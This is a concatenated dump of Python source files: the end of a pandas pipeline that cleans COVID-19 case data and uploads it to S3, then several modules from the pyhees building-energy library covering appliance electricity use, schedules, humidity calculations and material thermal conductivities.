self.us_confirmed = CovidDF(pd.read_csv(us_confirmed_url, error_bad_lines=False), 'us_confirmed', self.GB_US, self.CONFIRMED)
self.global_confirmed = CovidDF(pd.read_csv(global_confirmed_url, error_bad_lines=False), 'global_confirmed', self.GB_GLOBAL, self.CONFIRMED)
self.us_deaths = CovidDF(pd.read_csv(us_deaths_url, error_bad_lines=False), 'us_deaths', self.GB_US, self.DEATHS)
self.global_deaths = CovidDF(pd.read_csv(global_deaths_url, error_bad_lines=False), 'global_deaths', self.GB_GLOBAL, self.DEATHS)
self.global_recovered = CovidDF(pd.read_csv(global_recovered_url, error_bad_lines=False), 'global_recovered', self.GB_GLOBAL, self.RECOVERED)
self.DFs = [self.us_confirmed, self.global_confirmed, self.us_deaths, self.global_deaths, self.global_recovered]
def clean_time_series(self):
"""
Rename the cols of each dataframe, and rename all values of US -> United States
"""
for DF in self.DFs:
df = DF.df
df.rename(columns=self.cols_to_rename, inplace=True)
df.loc[df['country'] == 'US', 'country'] = 'United States'
def merge_missing_locations(self):
"""
The location file provided has a few missing locations (Yakutat, Alaska and Repatriated Travellers, Canada) as of 1/18/2021
Compare the US and Global confirmed files against the location file and add any missing locations to the location file
"""
#filter for the columns needed for combined key
df_gl = self.global_confirmed.df[['state', 'country', 'Lat', 'lon']]
df_us = self.us_confirmed.df[['state', 'country', 'Lat', 'lon', 'iso2', 'iso3', 'county']]
#create a combined key field in both us and global confirmed
df_gl['combined_key'] = (df_gl['state'] + ', ').fillna('') + df_gl['country']
df_us['combined_key'] = (df_us['county'] + ', ').fillna('') + (df_us['state'] + ', ').fillna('') + df_us['country']
#concat row-wise us and global confirmed
df_concat = pd.concat([df_gl, df_us], axis=0)
#get the missing locations
df_missing = df_concat.loc[~df_concat['combined_key'].isin(self.location.df['combined_key'])]
#create a 6 digit unique id, that's the smallest UID not used in the original location table
df_missing['location_id'] = df_missing.groupby('combined_key')['combined_key'].transform(lambda x: randint(100000, 999999))
df_missing['Population'] = np.nan
df_missing = df_missing[['location_id', 'country', 'state', 'iso2', 'iso3', 'county', 'Population', 'Lat', 'lon', 'combined_key']]
self.location.df = pd.concat([self.location.df, df_missing], axis=0)
def clean_location(self):
""" Clean/update the location dataframe """
df = self.location.df
df = df.rename(columns=self.cols_to_rename)
df = df[['location_id', 'country', 'state', 'iso2', 'iso3','county', 'Population', 'Lat', 'lon']]
df.loc[df['country'] == 'US', 'country'] = 'United States'
#have to manually recreate combined_key field since original field isnt consistently formatted
df['combined_key'] = (df['county'] + ', ').fillna('') + (df['state'] + ', ').fillna('') + df['country']
self.location.df = df
self.merge_missing_locations()
def get_date_cols(self, df):
""" Find the columns that match date regex """
pattern = re.compile(r'\d{1,2}/\d{1,2}/\d{2}')
date_cols = list(filter(pattern.match, df.columns))
return date_cols
def __convert_headers_to_datetime(self, df, date_cols):
"""
Convert the date columns from string -> datetime
"""
date_converted_cols = pd.to_datetime(date_cols, format='%m/%d/%y')
d = dict(zip(date_cols, date_converted_cols))
df = df.rename(columns=d)
return df
def __melt_cols(self, df, id_vars, metric):
""" Melt date columns to rows """
date_cols = self.get_date_cols(df)
cols_to_keep = id_vars + date_cols
df = df[cols_to_keep]
df = self.__convert_headers_to_datetime(df, date_cols)
df = df.melt(id_vars=id_vars, var_name='dt', value_name=metric)
return df
def melt_dfs(self):
""" For each df, melt datetime columns """
for DF in self.DFs:
DF.df = self.__melt_cols(DF.df, id_vars=DF.gb, metric=DF.metric).sort_values(DF.gb)
def __get_daily_totals(self, df, gb, metric):
"""
Converts metric cumsum value to daily values
"""
df['diff'] = df.groupby(gb, dropna=False)[metric].diff()
#fill the first diff value with the original value
#https://stackoverflow.com/questions/25289132/pandas-diff-on-first-records-in-timeseries-missing-data-returns-nan
df[metric] = df['diff'].fillna(df[metric])
df.drop('diff', axis=1, inplace=True)
return df
def get_daily_totals_dfs(self):
""" Converts cumsum totals to daily for all df's """
for DF in self.DFs:
DF.df = self.__get_daily_totals(DF.df, DF.gb, DF.metric)
def add_levels(self):
"""
Update inconsistent territory levels.
For example, China is only by country/state,
while France is by both country/state and country only.
This means that if summing up all the states to get each country's total,
would work for some countries (China),
but would double count for other countries (France)
To fix, this creates a seperate line for each missing level, i.e. create a country line for China
"""
for DF in self.DFs:
df = DF.df
if 'global' in DF.title:
null_countries = df.loc[df['state'].isnull()]['country'].unique()
# roll_countries don't have distinct country line, all their rows include states, i.e China, Aus
roll_countries = df.loc[~df['country'].isin(null_countries)]
#create distinct country line
rolled = roll_countries.groupby(['country', 'dt'])[roll_countries.columns[-1]].sum().reset_index()
rolled.insert(1, 'state', np.nan)
if not rolled.empty:
DF.df = pd.concat([df, rolled], axis=0)
else:
rolled = df.loc[df['county'].notnull()].groupby(['country', 'state', 'dt'])[df.columns[-1]].sum().reset_index()
rolled.insert(3, 'county', np.nan)
if not rolled.empty:
DF.df = pd.concat([df, rolled], axis=0)
def __save_csv(self, df, path, title, aws_key=None, aws_secret=None):
""" Save csv to either local or S3 """
f = f'{path}{title}_diff.csv'
if aws_key:
s3 = s3fs.S3FileSystem(key=aws_key, secret=aws_secret)
print(f'saving to s3: {f}')
f = s3.open(f, 'w')
print('finished s3 open')
df.to_csv(f, sep='\t', index=False)
def save_csv_local(self):
""" save as local file """
for DF in self.DFs:
self.__save_csv(DF.df, '/Users/jwong/Documents/', DF.title)
def save_csv_s3(self, aws_key, aws_secret, bucket):
""" save to s3 """
for DF in self.DFs:
self.__save_csv(DF.df, bucket, DF.title, aws_key, aws_secret)
#save location
self.__save_csv(self.location.df, bucket, self.location.title, aws_key, aws_secret)
def main(aws_key, aws_secret, bucket):
covid = CovidData()
covid.clean_time_series()
print(covid.us_confirmed.df.head())
covid.clean_location()
covid.melt_dfs()
print('made it to daily total')
covid.get_daily_totals_dfs()
print('made it add_levels')
covid.add_levels()
covid.save_csv_s3(aws_key, aws_secret, bucket)
if __name__ == '__main__':
main()
``` |
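The `main` entry point writes straight to S3, but the same pipeline can be run locally by swapping the final step. A sketch of the intended call order, assuming the `dags` folder is on the import path and leaving the hard-coded local path in `save_csv_local` as-is:

```python
from scripts.covid_pandas import CovidData  # assumes dags/ is on sys.path

covid = CovidData()                 # downloads the John Hopkins time-series CSVs
covid.clean_time_series()
covid.clean_location()
covid.melt_dfs()
covid.get_daily_totals_dfs()
covid.add_levels()
covid.save_csv_local()              # writes *_diff.csv files to the hard-coded local path
```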
{
"source": "jjj-design/pyhees",
"score": 2
} |
#### File: src/pyhees/section10_j1_d.py
```python
def get_E_Elc_washer_d_t(E_Elc_washer_wash_rtd, tm_washer_wash_d_t):
"""Calculate the hourly electricity consumption
Parameters
----------
E_Elc_washer_wash_rtd : float
Rated electricity consumption of one wash on the standard course, Wh
tm_washer_wash_d_t : ndarray(N-dimensional array)
ND array storing the number of washes for every hour of the year, count
The washes at hour t of day d are stored as 8760 consecutive values from the start of the year
Returns
----------
E_Elc_washer_d_t : ndarray(N-dimensional array)
ND array storing the electricity consumption for every hour of the year, kWh
The consumption at hour t of day d is stored as 8760 consecutive values from the start of the year
"""
E_Elc_washer_wash = get_E_Elc_washer_wash(E_Elc_washer_wash_rtd)
E_Elc_washer_d_t = E_Elc_washer_wash * tm_washer_wash_d_t
E_Elc_washer_d_t = E_Elc_washer_d_t * 10**(-3)
return E_Elc_washer_d_t
def get_E_Elc_washer_wash(E_Elc_washer_wash_rtd):
"""洗濯時の消費電力量を計算する
Parameters
----------
E_Elc_washer_wash_rtd : float
標準コースの洗濯の定格消費電力量,Wh
Returns
----------
E_Elc_washer_wash : float
1回の洗濯の消費電力量,Wh
"""
E_Elc_washer_wash = 1.3503 * E_Elc_washer_wash_rtd - 42.848
return E_Elc_washer_wash
```
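Both functions above are pure, so the annual washer consumption can be sketched with a synthetic schedule; the rated value and the one-wash-per-day pattern below are illustrative assumptions, not values from the standard:

```python
import numpy as np
from pyhees.section10_j1_d import get_E_Elc_washer_d_t

E_rtd = 68.0                      # hypothetical rated Wh for the standard course
tm = np.zeros(24 * 365)           # hourly wash counts for a year (8760 values)
tm[7::24] = 1                     # assume one wash every day at 07:00

E_d_t = get_E_Elc_washer_d_t(E_rtd, tm)   # per-wash Wh scaled by 10**(-3), i.e. kWh per hour
print(f"annual washer consumption: {E_d_t.sum():.1f} kWh")   # ≈ 17.9 kWh with these assumptions
```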
#### File: src/pyhees/section10_j1_h.py
```python
def get_E_Elc_PC_d_t(P_Elc_PC_rtd, t_PC_oprt_d_t):
"""Calculate the hourly electricity consumption
Parameters
----------
P_Elc_PC_rtd : float
Rated power consumption, W
t_PC_oprt_d_t : ndarray(N-dimensional array)
ND array storing the hours of use for every hour of the year, h
The hours of use at hour t of day d are stored as 8760 consecutive values from the start of the year
Returns
----------
E_Elc_PC_d_t : ndarray(N-dimensional array)
ND array storing the electricity consumption for every hour of the year, kWh
The consumption at hour t of day d is stored as 8760 consecutive values from the start of the year
"""
P_Elc_PC_oprt = get_P_Elc_PC_oprt(P_Elc_PC_rtd)
E_Elc_PC_oprt_d_t = P_Elc_PC_oprt * t_PC_oprt_d_t
E_Elc_PC_oprt_d_t = E_Elc_PC_oprt_d_t * 10**(-3)
return E_Elc_PC_oprt_d_t
def get_P_Elc_PC_oprt(P_Elc_PC_rtd):
"""Calculate the power consumption during use
Parameters
----------
P_Elc_PC_rtd : float
Rated power consumption, W
Returns
----------
P_Elc_PC_oprt : float
Power consumption during use, W
"""
P_Elc_PC_oprt = 1.0871 * P_Elc_PC_rtd + 2.2719
return P_Elc_PC_oprt
```
#### File: src/pyhees/section10_j1_j.py
```python
def get_E_Elc_audio_microsystem_with_md_d_t( \
P_Elc_audio_microsystem_with_md_rtd, \
P_Elc_audio_microsystem_with_md_standby_rtd, \
t_audio_microsystem_with_md_listening_d_t, \
t_audio_microsystem_with_md_standby_d_t):
"""Calculate the hourly electricity consumption
Parameters
----------
P_Elc_audio_microsystem_with_md_rtd : float
Rated power consumption, W
P_Elc_audio_microsystem_with_md_standby_rtd : float
Rated standby power consumption, W
t_audio_microsystem_with_md_listening_d_t : ndarray(N-dimensional array)
ND array storing the listening hours for every hour of the year, h
The listening hours at hour t of day d are stored as 8760 consecutive values from the start of the year
t_audio_microsystem_with_md_standby_d_t : ndarray(N-dimensional array)
ND array storing the standby hours for every hour of the year, h
The standby hours at hour t of day d are stored as 8760 consecutive values from the start of the year
Returns
----------
E_Elc_audio_microsystem_with_md_d_t : ndarray(N-dimensional array)
ND array storing the electricity consumption for every hour of the year, kWh
The consumption at hour t of day d is stored as 8760 consecutive values from the start of the year
"""
P_Elc_audio_microsystem_with_md_listening = get_P_Elc_audio_microsystem_with_md_listening(P_Elc_audio_microsystem_with_md_rtd)
P_Elc_audio_microsystem_with_md_standby = get_P_Elc_audio_microsystem_with_md_standby(P_Elc_audio_microsystem_with_md_standby_rtd)
E_Elc_audio_microsystem_with_md_d_t \
= P_Elc_audio_microsystem_with_md_listening * t_audio_microsystem_with_md_listening_d_t \
+ P_Elc_audio_microsystem_with_md_standby * t_audio_microsystem_with_md_standby_d_t
E_Elc_audio_microsystem_with_md_d_t = E_Elc_audio_microsystem_with_md_d_t * 10**(-3)
return E_Elc_audio_microsystem_with_md_d_t
def get_P_Elc_audio_microsystem_with_md_listening(P_Elc_audio_microsystem_with_md_rtd):
"""Calculate the power consumption during listening
Parameters
----------
P_Elc_audio_microsystem_with_md_rtd : float
Rated power consumption, W
Returns
----------
P_Elc_audio_microsystem_with_md_listening : float
Power consumption during listening, W
"""
P_Elc_audio_microsystem_with_md_listening = \
0.4 * P_Elc_audio_microsystem_with_md_rtd
return P_Elc_audio_microsystem_with_md_listening
def get_P_Elc_audio_microsystem_with_md_standby(P_Elc_audio_microsystem_with_md_standby_rtd):
"""Calculate the standby power consumption
Parameters
----------
P_Elc_audio_microsystem_with_md_standby_rtd : float
Rated standby power consumption, W
Returns
----------
P_Elc_audio_microsystem_with_md_standby : float
Standby power consumption, W
"""
P_Elc_audio_microsystem_with_md_standby = \
P_Elc_audio_microsystem_with_md_standby_rtd
return P_Elc_audio_microsystem_with_md_standby
```
#### File: src/pyhees/section10_j1_k.py
```python
def get_E_Elc_cleaner_d_t(P_Elc_cleaner_rtd, t_cleaner_oprt_d_t):
"""Calculate the hourly electricity consumption
Parameters
----------
P_Elc_cleaner_rtd : float
Rated power consumption, W
t_cleaner_oprt_d_t : ndarray(N-dimensional array)
ND array storing the hours of use for every hour of the year, h
The hours of use at hour t of day d are stored as 8760 consecutive values from the start of the year
Returns
----------
E_Elc_cleaner_d_t : ndarray(N-dimensional array)
ND array storing the electricity consumption for every hour of the year, kWh
The consumption at hour t of day d is stored as 8760 consecutive values from the start of the year
"""
P_Elc_cleaner_oprt = get_P_Elc_cleaner_oprt(P_Elc_cleaner_rtd)
E_Elc_cleaner_oprt_d_t = P_Elc_cleaner_oprt * t_cleaner_oprt_d_t
E_Elc_cleaner_oprt_d_t = E_Elc_cleaner_oprt_d_t * 10**(-3)
return E_Elc_cleaner_oprt_d_t
def get_P_Elc_cleaner_oprt(P_Elc_cleaner_rtd):
"""Calculate the power consumption during use
Parameters
----------
P_Elc_cleaner_rtd : float
Rated power consumption, W
Returns
----------
P_Elc_cleaner_oprt : float
Power consumption during use, W
"""
# P_Elc_cleaner_oprt = 1.0355 * P_Elc_cleaner_rtd
# In 試算結果_家電の電力消費量.xlsx, the value is forced to the constant below
P_Elc_cleaner_oprt = 498.333333333333
return P_Elc_cleaner_oprt
```
#### File: src/pyhees/section10_j1_o.py
```python
def get_E_Elc_dryer_d_t(P_Elc_dryer_rtd, t_dryer_oprt_d_t, number_of_people):
"""Calculate the hourly electricity consumption
Parameters
----------
P_Elc_dryer_rtd : float
Rated power consumption, W
t_dryer_oprt_d_t : ndarray(N-dimensional array)
ND array storing the hours of use for every hour of the year, h
The hours of use at hour t of day d are stored as 8760 consecutive values from the start of the year
number_of_people : int
Number of household members, persons
Returns
----------
E_Elc_dryer_d_t : ndarray(N-dimensional array)
ND array storing the electricity consumption for every hour of the year, kWh
The consumption at hour t of day d is stored as 8760 consecutive values from the start of the year
"""
P_Elc_dryer_oprt = get_P_Elc_dryer_oprt(P_Elc_dryer_rtd, number_of_people)
E_Elc_dryer_d_t = P_Elc_dryer_oprt * t_dryer_oprt_d_t
E_Elc_dryer_d_t = E_Elc_dryer_d_t * 10**(-3)
return E_Elc_dryer_d_t
def get_P_Elc_dryer_oprt(P_Elc_dryer_rtd, number_of_people):
"""Calculate the power consumption during use
Parameters
----------
P_Elc_dryer_rtd : float
Rated power consumption, W
number_of_people : int
Number of household members, persons
Returns
----------
P_Elc_dryer_oprt : float
Power consumption during use, W
"""
if number_of_people == 4:
P_Elc_dryer_oprt = 0.8974 * P_Elc_dryer_rtd
elif number_of_people == 3:
P_Elc_dryer_oprt = 0.8974 * P_Elc_dryer_rtd * 3 / 3
elif number_of_people == 2:
P_Elc_dryer_oprt = 0.8974 * P_Elc_dryer_rtd * 2 / 3
elif number_of_people == 1:
P_Elc_dryer_oprt = 0.8974 * P_Elc_dryer_rtd * 1 / 3
else:
raise ValueError(number_of_people)
return P_Elc_dryer_oprt
```
#### File: src/pyhees/section11_3.py
```python
import os
import pandas as pd
from functools import lru_cache
@lru_cache()
def load_schedule():
"""Load the schedule
Args:
Returns:
DataFrame: schedule
"""
path = os.path.join(os.path.dirname(__file__), 'data', 'schedule.csv')
return pd.read_csv(path)
def get_schedule_ac(df):
"""Heating and cooling schedule
Args:
df(DataFrame): schedule
Returns:
ndarray: heating and cooling schedule
"""
return df['暖冷房'].values
def get_schedule_v(df):
"""Ventilation schedule
Args:
df(DataFrame): schedule
Returns:
ndarray: ventilation schedule
"""
return df['換気'].values
def get_schedule_hw(df):
"""Hot water supply schedule
Args:
df(DataFrame): schedule
Returns:
ndarray: hot water supply schedule
"""
return df['給湯'].values
def get_schedule_l(df):
"""Lighting schedule
Args:
df(DataFrame): schedule
Returns:
ndarray: lighting schedule
"""
return df['照明'].values
def get_schedule_app(df):
"""Appliance schedule
Args:
df(DataFrame): schedule
Returns:
ndarray: appliance schedule
"""
return df['家電'].values
def get_schedule_cc(df):
"""Cooking schedule
Args:
df(DataFrame): schedule
Returns:
ndarray: cooking schedule
"""
return df['調理'].values
```
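The loader memoizes the bundled CSV with `lru_cache`, so repeated calls are cheap, and each accessor just pulls one column. A sketch, assuming the packaged `data/schedule.csv` is present:

```python
from pyhees.section11_3 import load_schedule, get_schedule_ac, get_schedule_hw

df = load_schedule()          # read once, cached for subsequent calls
ac = get_schedule_ac(df)      # heating/cooling schedule column
hw = get_schedule_hw(df)      # hot water supply schedule column
print(len(ac), ac[:3], hw[:3])
```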
#### File: src/pyhees/section11_5.py
```python
import numpy as np
# ============================================================================
# 5. Relative humidity
# ============================================================================
def get_h(Theta):
"""(1)
Args:
Theta: air temperature (℃)
Returns:
relative humidity (%)
"""
P_v = get_P_v()
P_vs = get_P_vs(Theta)
return (P_v / P_vs) * 100
# ============================================================================
# 6. 絶対湿度
# ============================================================================
def get_X(P_v):
    """(2)
    Args:
        P_v: 水蒸気圧(Pa)
    Returns:
        絶対湿度(kg/kg(DA))
    """
    F = get_F()
    return 0.622 * (P_v / (F - P_v))
def get_X_s(Theta):
"""(3)
Args:
Theta: 空気温度(℃)
Returns:
飽和空気の絶対湿度(kg/kg(DA))
"""
F = get_F()
P_vs = get_P_vs(Theta)
return 0.622 * (P_vs / (F - P_vs))
# ============================================================================
# 7. 水蒸気圧
# ============================================================================
def get_P_v(X):
    """(4)
    Args:
        X: 絶対湿度(kg/kg(DA))
    Returns:
        水蒸気圧(Pa)
    """
    F = get_F()
    return F * (X / (0.622 + X))
# ============================================================================
# 8. 飽和水蒸気圧
# ============================================================================
def get_P_vs(Theta):
"""(5a)(5b)
Args:
Theta: 空気温度(℃)
Returns:
飽和水蒸気圧(Pa)
"""
# 表1 式(5b)中の係数
a1 = -6096.9385
a2 = 21.2409642
a3 = -0.02711193
a4 = 0.00001673952
a5 = 2.433502
b1 = -6024.5282
b2 = 29.32707
b3 = 0.010613863
b4 = -0.000013198825
b5 = -0.49382577
T = get_T(Theta)
# (5b)
if Theta > 0:
k = a1 / T + a2 + a3 * T + a4 * T ** 2 + a5 * np.log(T)
else:
k = b1 / T + b2 + b3 * T + b4 * T ** 2 + b5 * np.log(T)
# (5a)
return np.exp(k)
# ============================================================================
# 9. 絶対温度
# ============================================================================
def get_T(Theta):
"""(6)
Args:
Theta: 空気温度(℃)
Returns:
絶対温度(K)
"""
return Theta + 273.16
# ============================================================================
# 10. その他
# ============================================================================
# 大気圧 (Pa)
def get_F():
""" """
return 101325
```
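A quick illustrative check of the psychrometric helpers at 20 °C (a sketch; note that `get_P_vs` branches on `Theta > 0`, so it expects a scalar temperature rather than an ndarray):
```python
from pyhees.section11_5 import get_T, get_P_vs, get_X_s

Theta = 20.0                 # air temperature, °C
print(get_T(Theta))          # absolute temperature, K
print(get_P_vs(Theta))       # saturation vapour pressure, Pa (roughly 2.3 kPa)
print(get_X_s(Theta))        # saturation absolute humidity, kg/kg(DA)
```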
#### File: src/pyhees/section3_1_heatingday.py
```python
import numpy as np
# ============================================================================
# 10. 暖房日
# ============================================================================
def get_heating_flag_d(L_dash_H_R_d_t_i):
"""暖房日 = 暖房使用が発生することが見込まれる日
Args:
L_dash_H_R_d_t_i(ndarray): 標準住戸の負荷補正前の暖房負荷 (MJ/h)
Returns:
ndarray: 暖房使用が発生することが見込まれる日
"""
L_dash_H_R_d_t = np.sum(L_dash_H_R_d_t_i, axis=0)
L_dash_H_R_d = np.sum(L_dash_H_R_d_t.reshape(365, 24), axis=1)
heating_flag_d = np.ones(365)
heating_flag_d[1:] = L_dash_H_R_d[0:364] > 0
return heating_flag_d
```
#### File: src/pyhees/section3_3_a.py
```python
def calc_lambda(material):
"""表1と表2より材質の熱伝導率を得る
Args:
material(str): 建材等名称
Returns:
float: 熱伝導率λ(W/mK)
"""
    if material is None:
        return None
    try:
        return get_table_1(material)
    except KeyError:
        try:
            return get_table_2(material)
        except KeyError:
            raise ValueError(material)
def get_table_1(material):
"""表1 建材等の熱物性値
Args:
material(str): 建材等名称
Returns:
float: 熱伝導率λ(W/mK)
"""
material_dict = {}
# 金属:鋼 アルミニウム 銅 ステンレス鋼
metal_dict = {'Steel': 55, 'Aluminum': 210,
'Copper': 370, 'StainlessSteel': 15}
material_dict.update(metal_dict)
# 岩石・土壌:岩石 土壌
rock_mud_dict = {'Rock': 3.1, 'Mud': 1.0}
material_dict.update(rock_mud_dict)
# コンクリート系材料:コンクリート 軽量コンクリート(軽量1種) 軽量コンクリート(軽量2種)
# コンクリートブロック(重量) コンクリートブロック(軽量) セメント・モルタル 押出成型セメント板
concrete_dict = {'Concrete': 1.6, 'LC1': 0.8, 'LC2': 0.5,
'CBheavy': 1.1, 'CBlight': 0.53, 'Mortar': 1.5, 'ECP': 0.40}
material_dict.update(concrete_dict)
# 非木質系壁材・下地材:せっこうプラスター しっくい 土壁 ガラス
# タイル れんが かわら ロックウール化粧吸音板 火山性ガラス質複層板
notwoood_dict = {'GypsumPlaster': 0.60, 'CementPlaster': 0.74, 'MudWall': 0.69, 'Glass': 1.0,
'Tile': 1.3, 'Brick': 0.64, 'RoofTile': 1.0, 'DressedRockwoolBoard': 0.064, 'Vsboard': 0.13}
material_dict.update(notwoood_dict)
# 木質系壁材・下地材:天然木材 合板 木毛セメント板 木片セメント板
# ハードファイバーボード(ハードボード) ミディアムデンシティファイバーボード(MDF) 直交集成板(CLTパネル)
wood_dict = {'Wood': 0.12, 'PlywoodBoard': 0.16, 'CementWoodWool': 0.13, 'CementWoodFlake': 0.15,
'HardFiberBoard': 0.17, 'MDF': 0.12, 'CLT': 0.12}
material_dict.update(wood_dict)
# 床材:ビニル系床材 FRP
# アスファルト類 畳 カーペット類
floor_dict = {'VinylFloor': 0.19, 'FRP': 0.26,
'Asphart': 0.11, 'Tatami': 0.083, 'Carpet': 0.08}
material_dict.update(floor_dict)
# グラスウール断熱材:グラスウール断熱材10K相当 グラスウール断熱材16K相当 グラスウール断熱材20K相当
# グラスウール断熱材24K相当 グラスウール断熱材32K相当
# 高性能グラスウール断熱材16K相当 高性能グラスウール断熱材24K相当 高性能グラスウール断熱材32K相当
# 高性能グラスウール断熱材40K相当 高性能グラスウール断熱材48K相当
# 吹込み用グラスウール13K相当 吹込み用グラスウール18K相当 吹込み用グラスウール30K相当 吹込み用グラスウール35K相当
gw_dict = {'GW10K': 0.050, 'GW16K': 0.045, 'GW20K': 0.042,
'GW24K': 0.038, 'GW32K': 0.036,
'HGW16K': 0.038, 'HGW24K': 0.036, 'HGW32K': 0.035,
'HGW40K': 0.034, 'HGW48K': 0.033,
'BlowingGW13K': 0.052, 'BlowingGW18K': 0.052, 'BlowingGW30K': 0.040, 'BlowingGW35K': 0.040}
material_dict.update(gw_dict)
# ロックウール断熱材:吹付けロックウール ロックウール断熱材(マット) ロックウール断熱材(フェルト) ロックウール断熱材(ボード)
# 吹込み用ロックウール25K相当 吹込み用ロックウール65K相当
rock_wool_dict = {'SprayedRockWool': 0.064, 'RockWoolMat': 0.038, 'RockWoolFelt': 0.038, 'RockWoolBoard': 0.036,
'BlowingRockWool25K': 0.047, 'BlowingRockWool65K': 0.039}
material_dict.update(rock_wool_dict)
# セルローズファイバー断熱材:吹込み用セルローズファイバー25K
# 吹込み用セルローズファイバー45K吹込み用セルローズファイバー55K
cellulose_dict = {'BlowingCelluloseFiber25K': 0.040,
'BlowingCelluloseFiber45K': 0.040, 'BlowingCelluloseFiber55K': 0.040}
material_dict.update(cellulose_dict)
# ポリスチレンフォーム断熱材:押出法ポリスチレンフォーム保温板1種 押出法ポリスチレンフォーム保温板2種 押出法ポリスチレンフォーム保温板3種
# A種ポリエチレンフォーム保温板1種2号 A種ポリエチレンフォーム保温板2種 ビーズ法ポリスチレンフォーム保温板特号
# ビーズ法ポリスチレンフォーム保温板1号 ビーズ法ポリスチレンフォーム保温板2号
# ビーズ法ポリスチレンフォーム保温板3号 ビーズ法ポリスチレンフォーム保温板4号
polyethylene_dict = {'XPSPlate1': 0.040, 'XPSPlate2': 0.034, 'XPSPlate3': 0.028,
'PolyethyleneFoam1': 0.042, 'PolyethyleneFoam2': 0.038, 'EPSPlateSP': 0.034,
'EPSPlate1': 0.036, 'EPSPlate2': 0.037,
'EPSPlate3': 0.040, 'EPSPlate4': 0.043}
material_dict.update(polyethylene_dict)
# ウレタンフォーム断熱材:硬質ウレタンフォーム保温板2種1号 硬質ウレタンフォーム保温板2種2号
urethane_dict = {'PUFPlate1': 0.023, 'PUFPlate2': 0.024}
material_dict.update(urethane_dict)
# フェノールフォーム断熱材:フェノールフォーム保温板1種1号 フェノールフォーム保温板1種2号
phenolic_dict = {'PhenolicFoamPlate1': 0.022, 'PhenolicFoamPlate2': 0.022}
material_dict.update(phenolic_dict)
return material_dict[material]
def get_table_2(material):
"""表2 JISで熱物性値の定めのある建材等の熱物性値
Args:
material(str): 建材名称
Returns:
float: 熱伝導率λ(W/mK)
"""
material_dict = {}
# コンクリート系材料:軽量気泡コンクリートパネル(ALCパネル)
concrete_dict = {'ALC': 0.19}
material_dict.update(concrete_dict)
# 非木質系壁材・下地材:せっこうボード/GB-R/GB-D/GB-L/GB-NC, せっこうボード/GB-S/GB-F, せっこうボード/GB-R-H/GB-S-H/GB-D-H,
# 0.8ケイ酸カルシウム板, 1.0ケイ酸カルシウム板
    notwoood_dict = {'GB_R_D_L_NC': 0.221, 'GB_S_F': 0.241, 'GB_RH_SH_DH': 0.366,
                     'CalciumSilicateBoard08': 0.18, 'CalciumSilicateBoard10': 0.24}
    material_dict.update(notwoood_dict)
# 木質系壁材・下地材:タタミボード, A級インシュレーションボード,
# シージングボード, パーティクルボード
wood_dict = {'TatamiBoard': 0.056, 'InsulationBoardA': 0.058,
'GypsumSheathingBoard': 0.067, 'ParticleBoard': 0.167}
material_dict.update(wood_dict)
# 床材:稲わら畳床, ポリスチレンフォームサンドイッチ稲わら畳床, タタミボードサンドイッチ稲わら畳床,
# 建材畳床(Ⅰ形), 建材畳床(Ⅱ形), 建材畳床(Ⅲ形), 建材畳床(K、N形)
floor_dict = {'RiceStrawTatamiFloor': 0.07, 'PFSRiceStrawTatamiFloor': 0.054, 'TBSRiceStrawTatamiFloor': 0.063,
'TatamiFloor1': 0.062, 'TatamiFloor2': 0.053, 'TatamiFloor3': 0.052, 'TatamiFloorKN': 0.050}
material_dict.update(floor_dict)
# グラスウール断熱材:通常品10-50, 通常品10-49, 通常品10-48, 通常品12-45, 通常品12-44,
# 通常品16-45, 通常品16-44, 通常品20-42, 通常品20-41, 通常品20-40,
# 通常品24-38, 通常品32-36, 通常品40-36, 通常品48-35, 通常品64-35, 通常品80-33, 通常品96-33,
# 高性能品HG10-47, 高性能品HG10-46, 高性能品HG10-45, 高性能品HG10-44, 高性能品HG10-43,
# 高性能品HG12-43, 高性能品HG12-42, 高性能品HG12-41, 高性能品HG14-38, 高性能品HG14-37,
# 高性能品HG16-38, 高性能品HG16-37, 高性能品HG16-36,
# 高性能品HG20-38, 高性能品HG20-37, 高性能品HG20-36, 高性能品HG20-35, 高性能品HG20-34,
# 高性能品HG24-36, 高性能品HG24-35, 高性能品HG24-34, 高性能品HG24-33,
# 高性能品HG28-35, 高性能品HG28-34, 高性能品HG28-33,
# 高性能品HG32-35, 高性能品HG32-34, 高性能品HG32-33,
# 高性能品HG36-34, 高性能品HG36-33, 高性能品HG36-32, 高性能品HG36-31,
# 高性能品HG38-34, 高性能品HG38-33, 高性能品HG38-32, 高性能品HG38-31,
# 高性能品HG40-34, 高性能品HG40-33, 高性能品HG40-32, 高性能品HG48-33, 高性能品HG48-32, 高性能品HG48-31
gw_dict = {'GW10_50': 0.05, 'GW10_49': 0.049, 'GW10_48': 0.048, 'GW12_45': 0.045, 'GW12_44': 0.044,
'GW16_45': 0.045, 'GW16_44': 0.044, 'GW20_42': 0.042, 'GW20_41': 0.041, 'GW20_40': 0.04,
'GW24_38': 0.038, 'GW32_36': 0.036, 'GW40_36': 0.036, 'GW48_35': 0.035, 'GW64_35': 0.035, 'GW80_33': 0.033, 'GW96_33': 0.033,
'HGW10_47': 0.047, 'HGW10_46': 0.046, 'HGW10_45': 0.045, 'HGW10_44': 0.044, 'HGW10_43': 0.043,
'HGW12_43': 0.043, 'HGW12_42': 0.042, 'HGW12_41': 0.041, 'HGW14_38': 0.038, 'HGW14_37': 0.037,
'HGW16_38': 0.038, 'HGW16_37': 0.037, 'HGW16_36': 0.036,
'HGW20_38': 0.038, 'HGW20_37': 0.037, 'HGW20_36': 0.036, 'HGW20_35': 0.035, 'HGW20_34': 0.034,
'HGW24_36': 0.036, 'HGW24_35': 0.035, 'HGW24_34': 0.034, 'HGW24_33': 0.033,
'HGW28_35': 0.035, 'HGW28_34': 0.034, 'HGW28_33': 0.033,
'HGW32_35': 0.035, 'HGW32_34': 0.034, 'HGW32_33': 0.033,
'HGW36_34': 0.034, 'HGW36_33': 0.033, 'HGW36_32': 0.032, 'HGW36_31': 0.031,
'HGW38_34': 0.034, 'HGW38_33': 0.033, 'HGW38_32': 0.032, 'HGW38_31': 0.031,
'HGW40_34': 0.034, 'HGW40_33': 0.033, 'HGW40_32': 0.032, 'HGW48_33': 0.033, 'HGW48_32': 0.032, 'HGW48_31': 0.031}
material_dict.update(gw_dict)
# ロックウール断熱材:LA, LB, LC, LD,
# MA, MB, MC,
# HA, HB, HC,
rock_wool_dict = {'RockWoolLA': 0.045, 'RockWoolLB': 0.043, 'RockWoolLC': 0.041, 'RockWoolLD': 0.039,
'RockWoolMA': 0.038, 'RockWoolMB': 0.037, 'RockWoolMC': 0.036,
